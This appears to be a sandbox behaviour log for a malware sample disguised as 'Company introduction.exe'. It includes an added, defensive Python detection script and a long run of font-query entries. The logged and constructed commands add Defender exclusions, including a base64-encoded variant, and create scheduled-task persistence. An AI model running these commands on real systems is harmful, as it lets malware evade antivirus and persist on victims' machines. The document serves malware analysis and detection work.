Source: C:\Users\user\Desktop\Company introduction.exe | Memory written: C:\Users\user\Desktop\Company introduction.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Company introduction.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
Source: C:\Users\user\Desktop\Company introduction.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp"
Source: C:\Users\user\Desktop\Company introduction.exe | Process created: C:\Users\user\Desktop\Company introduction.exe "C:\Users\user\Desktop\Company introduction.exe"
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp"
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Process created: C:\Users\user\AppData\Roaming\FzXKnGk.exe "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Process created: C:\Users\user\AppData\Roaming\FzXKnGk.exe "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
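Detection logic for the process chain recorded in this section, as an added example that is not part of the Joe Sandbox report or of the sample. The event records below are constructed from the "Process created" lines above (the parent/image/cmdline schema is a simplification of my own, not a Sysmon or EDR field layout), plus two benign controls and one variant that hides the cmdlet behind -EncodedCommand, since a Defender-exclusion rule that only matches the plain cmdlet name misses it. Three rules are applied: Add-MpPreference with an exclusion that points at, or is requested from, a user-writable path; schtasks /Create whose /XML file sits in a temp directory; and a process spawning a copy of itself from a user-writable path.

```python
import base64
import re

# Constructed events mirroring the "Process created" lines in the report;
# the parent/image/cmdline schema is a simplification, not a Sysmon/EDR format.
SAMPLE = r"C:\Users\user\Desktop\Company introduction.exe"
DROPPED = r"C:\Users\user\AppData\Roaming\FzXKnGk.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"


def _encoded(script: str) -> str:
    """PowerShell -EncodedCommand carries base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


EVENTS = [
    {"parent": SAMPLE, "image": PS,
     "cmdline": f'"{PS}" Add-MpPreference -ExclusionPath "{DROPPED}"'},
    # same cmdlet hidden behind -enc (constructed variant, not seen in the report)
    {"parent": SAMPLE, "image": PS,
     "cmdline": f'"{PS}" -nop -w hidden -enc ' + _encoded(f'Add-MpPreference -ExclusionPath "{DROPPED}"')},
    {"parent": SAMPLE, "image": SCHTASKS,
     "cmdline": f'"{SCHTASKS}" /Create /TN "Updates\\FzXKnGk" /XML "C:\\Users\\user\\AppData\\Local\\Temp\\tmpE629.tmp"'},
    {"parent": SAMPLE, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"parent": DROPPED, "image": DROPPED, "cmdline": f'"{DROPPED}"'},
    # benign controls: an admin excluding an installed agent, and a self-spawning browser
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": f'"{PS}" Add-MpPreference -ExclusionPath "C:\\Program Files\\Vendor\\agent.exe"'},
    {"parent": r"C:\Program Files\Browser\browser.exe", "image": r"C:\Program Files\Browser\browser.exe",
     "cmdline": '"C:\\Program Files\\Browser\\browser.exe" --type=renderer'},
]

USER_WRITABLE = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\(?:AppData|Desktop|Downloads|Documents)\\", re.I)
TEMP_DIR = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.I)
ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
MP_EXCL = re.compile(r'Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\s+(?:"([^"]+)"|(\S+))', re.I | re.S)
XML_ARG = re.compile(r'/xml\s+(?:"([^"]+)"|(\S+))', re.I)


def effective_cmdline(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload so rules see the script even
    when the cmdlet name never appears in the visible command line."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline + " " + decoded


def rule_defender_exclusion(ev):
    m = MP_EXCL.search(effective_cmdline(ev["cmdline"]))
    if not m:
        return None
    target = m.group(1) or m.group(2)
    # An exclusion is suspicious when the excluded object or the requesting
    # parent lives where an unprivileged user can write.
    if USER_WRITABLE.match(target) or USER_WRITABLE.match(ev["parent"]):
        return "defender_exclusion_from_user_path"
    return None


def rule_schtasks_temp_xml(ev):
    c = ev["cmdline"]
    if re.search(r"\bschtasks(?:\.exe)?\b", c, re.I) and re.search(r"/create\b", c, re.I):
        m = XML_ARG.search(c)
        if m and TEMP_DIR.search(m.group(1) or m.group(2)):
            return "schtasks_from_temp_xml"
    return None


def rule_self_spawn_user_path(ev):
    # Self-spawn alone is common (browsers, updaters); gate it on the image path.
    if ev["image"].lower() == ev["parent"].lower() and USER_WRITABLE.match(ev["image"]):
        return "self_spawn_from_user_path"
    return None


RULES = (rule_defender_exclusion, rule_schtasks_temp_xml, rule_self_spawn_user_path)


def triage(events):
    """Return (rule name, image path) for every rule that fires on each event."""
    hits = []
    for ev in events:
        for rule in RULES:
            name = rule(ev)
            if name:
                hits.append((name, ev["image"]))
    return hits


if __name__ == "__main__":
    for name, image in triage(EVENTS):
        print(f"{name:35} {image}")
```

Add-MpPreference only changes Defender configuration when the caller is elevated, but the process-creation record is left behind either way, which is why the rule keys on the command line rather than on a resulting exclusion; on a live host, `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` shows whether the exclusion actually landed. The self-spawn rule is the weakest of the three on its own; in this report it is corroborated by the "Memory written ... base: 400000 value starts with: 4D5A" line, an MZ header written into the child at its image base, which is consistent with the suspended child being hollowed and a different PE being loaded into it.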
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Users\user\Desktop\Company introduction.exe VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
